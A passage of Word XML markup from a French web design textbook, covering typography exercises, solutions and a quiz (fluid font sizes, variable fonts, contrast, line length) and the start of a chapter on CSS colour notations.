        <w:t xml:space="preserve"> et des variables.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Définissez l'interligne pour chaque niveau.</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le rendu à 320, 768 et 1440 pixels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 11.2 — Optimiser une police personnalisée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Vous disposez de la police Inter en quatre fichiers statiques de 180 Ko.</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Remplacez-les par une police variable.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 xml:space="preserve">Ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-display</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>unicode-range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et le préchargement.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Mesurez le gain dans l'onglet Réseau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 11.3 — Corriger une page illisible</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Cette page fait fuir les lecteurs. Corrigez cinq problèmes de lisibilité.</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>body { font-size: 12px; line-height: 1.1; text-align: justify; }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>p { width: 100%; }</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 xml:space="preserve">Titres </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la même taille que le corps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#333</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>letter-spacing: -0.05em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le corps de texte</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11.1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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte-s: clamp(0.875rem, 0.83rem + 0.2vw, 1rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte-m: clamp(1rem, 0.95rem + 0.25vw, 1.125rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte-l: clamp(1.25rem, 1.1rem + 0.7vw, 1.75rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte-xl: clamp(1.6rem, 1.3rem + 1.5vw, 2.75rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte-xxl: clamp(2rem, 1.5rem + 2.5vw, 4rem);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>body { font-size: var(--texte-m); line-height: 1.65; }</w:t>
        <w:br/>
        <w:t>h3 { font-size: var(--texte-l); line-height: 1.3; }</w:t>
        <w:br/>
        <w:t>h2 { font-size: var(--texte-xl); line-height: 1.2; }</w:t>
        <w:br/>
        <w:t>h1 { font-size: var(--texte-xxl); line-height: 1.05; letter-spacing: -0.02em;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les tailles les plus grandes ont un interligne plus serré : à 64 px, un interligne de 1,65 créerait des lignes distantes et un titre disloqué.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>À 320 pixels, la borne minimale s'applique : le titre reste lisible sans déborder. À 1440, la borne maximale évite un titre qui occupe tout l'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 11.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un fichier variable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>inter-var.woff2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> couvre les graisses 100 à 900 en environ 100 Ko, contre 720 Ko pour quatre fichiers statiques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>unicode-range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> limite les caractères téléchargés au latin de base ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-display: swap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite le texte invisible ; le préchargement démarre la requête plus tôt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le gain se mesure en kilo-octets transférés et en temps de premier rendu. Sur une connexion 3G, l'écart atteint souvent une seconde.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 11.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Corps à 17 px minimum, interligne 1,6, alignement à gauche.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Limiter la largeur à 68ch et centrer la colonne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Établir une hiérarchie : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> au moins 1,4 fois le corps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Contraste insuffisant (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#333</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≈ 1,2:1) : viser 4,5:1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un espacement négatif serre les lettres et nuit à la dyslexie ; le réserver aux très grands titres.</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-display: swap</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Il bloque l'affichage jusqu'au chargement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Il affiche une police de substitution puis remplace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Il empêche le téléchargement de la police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Il désactive les italiques</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Quelle est la mesure de ligne recommandée pour un texte long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20 à 30 caractères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45 à 75 caractères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90 à 120 caractères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Illimitée</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Quel rapport de contraste minimal pour du texte courant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2:1</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3:1</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4,5:1</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7:1</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 xml:space="preserve">Pourquoi éviter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>text-align: justify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le Web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Il n'est pas supporté</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Il crée des espaces irréguliers sans césure fine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Il ralentit le rendu</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Il empêche le zoom</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Quelle unité pour une taille de police respectant les préférences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px</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rem</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pt</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cm</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Le texte est rendu immédiatement avec une police de secours, puis remplacé lorsque la police personnalisée est disponible.</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Entre 45 et 75 caractères, l'œil retrouve le début de la ligne suivante sans effort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WCAG AA exige 4,5:1 pour le texte courant et 3:1 pour les grands textes.</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La justification sans césure contrôlée produit des « rivières » et gêne la lecture, surtout pour les personnes dyslexiques.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se rapporte à la taille racine, que l'utilisateur peut modifier dans son navigateur ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ignore ce réglage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>12. Couleurs, fonds et contrastes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La couleur n'est pas un décor : elle porte de l'information, crée une hiérarchie et conditionne l'accessibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 30 · Niveau : Débutant · Prérequis : chapitre 11</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Écrire une couleur en hexadécimal, en RGB, en HSL et en couleurs modernes.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Construire une palette cohérente et documentée.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Mesurer et garantir un contraste conforme.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Composer des dégradés et des arrière-plans maîtrisés.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Ne jamais faire dépendre une information de la seule couleur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.1 Quatre syntaxes pour une même couleur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSS accepte plusieurs notations. Chacune a ses usages : la notation hexadécimale est compacte, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rgb()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> explicite, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hsl()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> intuitive pour construire une palette, les notations modernes permettent la transparence et les espaces colorimétriques étendus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq écritures, une seule couleur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.exemple {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #0f2e4c;                  /* hexadécimal */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: rgb(15 46 76);            /* rouge, vert, bleu */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: hsl(210 67% 18%);         /* teinte, saturation, luminosité */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: hsl(210 67% 18% / .85);   /* avec transparence */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: oklch(30% 0.06 250);      /* espace perceptuel moderne */</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.41 — Cinq notations et leur intérêt</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29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Notation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Forces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Limites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hexadécimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compact, universel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Peu intuitif à ajuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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rgb()</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Lisible, alpha intégré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Calcul mental difficile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hsl()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variations intuitives de teinte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Luminosité non perceptuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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oklch()</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Perceptuellement uniforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Support récent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variables nommées</w:t>
